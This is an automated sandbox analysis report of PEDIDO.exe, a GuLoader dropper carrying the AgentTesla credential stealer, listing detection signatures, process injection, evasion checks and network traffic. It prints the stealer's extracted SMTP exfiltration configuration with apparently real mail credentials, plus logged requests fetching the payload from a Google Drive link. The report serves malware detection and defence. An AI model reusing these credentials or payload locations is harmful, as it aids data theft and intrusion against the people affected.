Loading ...

Play interactive tourEdit tour

Windows Analysis Report PEDIDO.exe

Overview

General Information

Sample Name:PEDIDO.exe
Analysis ID:1650
MD5:83046fa32e563289dbd98efe27f884f4
SHA1:fdacb1537161c011f5803471b6971225010d4e71
SHA256:6b3d06b20b3ae5a3dd8d3a2eb9eb1f1a86d9ba5eb59f5ef75cfa1b2f28dcfd6c
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Drops certificate files (DER)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • PEDIDO.exe (PID: 416 cmdline: 'C:\Users\user\Desktop\PEDIDO.exe' MD5: 83046FA32E563289DBD98EFE27F884F4)
    • RegAsm.exe (PID: 6920 cmdline: 'C:\Users\user\Desktop\PEDIDO.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 2404 cmdline: 'C:\Users\user\Desktop\PEDIDO.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comsarahmorg434@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.42592354775.0000000002C30000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: RegAsm.exe PID: 2404JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 2404JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 188.93.227.195, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 2404, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49799

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: RegAsm.exe.2404.5.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comsarahmorg434@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: PEDIDO.exeVirustotal: Detection: 23%Perma Link
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: PEDIDO.exeAvira: detected
            Antivirus detection for URL or domainShow sources
            Source: http://mail.tccinfaes.comAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: mail.tccinfaes.comVirustotal: Detection: 11%Perma Link
            Source: http://mail.tccinfaes.comVirustotal: Detection: 11%Perma Link
            Source: 2.0.PEDIDO.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.lwket
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00FD2338 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00FD2A70 CryptUnprotectData,
            Source: PEDIDO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49791 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49792 version: TLS 1.2

            Networking:

            barindex
            Source: Joe Sandbox ViewASN Name: CLARANET-ASClaraNETLTDGB CLARANET-ASClaraNETLTDGB
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 188.93.227.195 188.93.227.195
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/d4i6055jl54qaa9s37lc8j7fnoiuafqn/1634146200000/00014782062933200622/*/1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-88-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49799 -> 188.93.227.195:587
            Source: global trafficTCP traffic: 192.168.11.20:49799 -> 188.93.227.195:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmpString found in binary or memory: http://GkEcfT.com
            Source: RegAsm.exe, 00000005.00000002.47253108213.000000001FDDA000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: RegAsm.exe, 00000005.00000003.42564859038.0000000000F19000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000005.00000003.42564859038.0000000000F19000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000005.00000002.47252517493.000000001FD10000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en#z
            Source: RegAsm.exe, 00000005.00000002.47252517493.000000001FD10000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: RegAsm.exe, 00000005.00000002.47247239985.000000001DD0C000.00000004.00000001.sdmpString found in binary or memory: http://mail.tccinfaes.com
            Source: RegAsm.exe, 00000005.00000002.47253108213.000000001FDDA000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0)
            Source: RegAsm.exe, 00000005.00000002.47253108213.000000001FDDA000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: RegAsm.exe, 00000005.00000002.47247239985.000000001DD0C000.00000004.00000001.sdmpString found in binary or memory: http://tccinfaes.com
            Source: RegAsm.exe, 00000005.00000002.47253108213.000000001FDDA000.00000004.00000001.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: RegAsm.exe, 00000005.00000002.47235666189.0000000000F1B000.00000004.00000020.sdmp, 2D85F72862B55C4EADD9E66E06947F3D.5.drString found in binary or memory: http://x1.i.lencr.org/
            Source: RegAsm.exe, 00000005.00000002.47253108213.000000001FDDA000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: RegAsm.exe, 00000005.00000002.47252949580.000000001FDBB000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/H
            Source: RegAsm.exe, 00000005.00000002.47247072813.000000001DCF0000.00000004.00000001.sdmpString found in binary or memory: https://ZjJPdvMOyw165opG2hLg.org
            Source: RegAsm.exe, 00000005.00000002.47247072813.000000001DCF0000.00000004.00000001.sdmpString found in binary or memory: https://ZjJPdvMOyw165opG2hLg.orgD
            Source: RegAsm.exe, 00000005.00000002.47247072813.000000001DCF0000.00000004.00000001.sdmpString found in binary or memory: https://ZjJPdvMOyw165opG2hLg.orgt-
            Source: RegAsm.exe, 00000005.00000003.42564859038.0000000000F19000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000005.00000002.47235182001.0000000000ECD000.00000004.00000020.sdmpString found in binary or memory: https://doc-0c-88-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000005.00000002.47235182001.0000000000ECD000.00000004.00000020.sdmpString found in binary or memory: https://doc-0c-88-docs.googleusercontent.com/$
            Source: RegAsm.exe, 00000005.00000003.42564732729.0000000000F0B000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47235473464.0000000000EFB000.00000004.00000020.sdmpString found in binary or memory: https://doc-0c-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/d4i6055j
            Source: RegAsm.exe, 00000005.00000002.47234868425.0000000000E88000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/d
            Source: RegAsm.exe, 00000005.00000002.47234868425.0000000000E88000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/l
            Source: RegAsm.exe, 00000005.00000002.47234868425.0000000000E88000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.47233899544.00000000007F0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrC
            Source: RegAsm.exe, 00000005.00000002.47234868425.0000000000E88000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrCY
            Source: RegAsm.exe, 00000005.00000003.42564732729.0000000000F0B000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrCpgS8lwJVzhRuGhVes
            Source: RegAsm.exe, 00000005.00000002.47246765132.000000001DCAB000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 00000005.00000002.47246602234.000000001DC8D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 00000005.00000002.47246602234.000000001DC8D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 00000005.00000002.47246602234.000000001DC8D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 00000005.00000002.47246765132.000000001DCAB000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/d4i6055jl54qaa9s37lc8j7fnoiuafqn/1634146200000/00014782062933200622/*/1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-88-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49791 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49792 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3DJump to dropped file
            Source: PEDIDO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_00401441
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_0040167D
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_00401630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A4C080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A4BA48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A43A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A44320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A41130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A43708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00AA6D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00AA07E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E778D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E77A3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E7DBA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E76728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E744F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E7D7A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E73330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00FD70F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00FDAC28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00FDF150
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00FD0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00FD0006
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00FD6148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA05E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA04ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA05DC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA06AF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1FE62BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1FE67438
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1FE60040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1FE66810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1FE6A7D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1FE6741D
            Source: PEDIDO.exe, 00000002.00000002.42591006110.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSkovslotte5.exe vs PEDIDO.exe
            Source: PEDIDO.exeBinary or memory string: OriginalFilenameSkovslotte5.exe vs PEDIDO.exe
            Source: C:\Users\user\Desktop\PEDIDO.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dll
            Source: PEDIDO.exeVirustotal: Detection: 23%
            Source: PEDIDO.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PEDIDO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\PEDIDO.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\PEDIDO.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3DJump to behavior
            Source: C:\Users\user\Desktop\PEDIDO.exeFile created: C:\Users\user\AppData\Local\Temp\~DFF4A430973BE8926E.TMPJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@6/3@5/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000002.00000002.42592354775.0000000002C30000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_00406171 push ds; ret
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_02C336C4 push ebx; retf
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_02C3448B pushad ; iretd
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_02C32AA2 push 5EE706AFh; ret
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_02C31CAE push cs; iretd
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_02C30401 pushfd ; iretd
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_02C34C37 push cs; retf
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_02C341F0 push ebp; ret
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_02C32BA4 push 6DF2974Ah; ret
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 2_2_02C3430F push ebp; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1FE654C0 push esp; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1FE65313 pushfd ; retf 00E6h
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
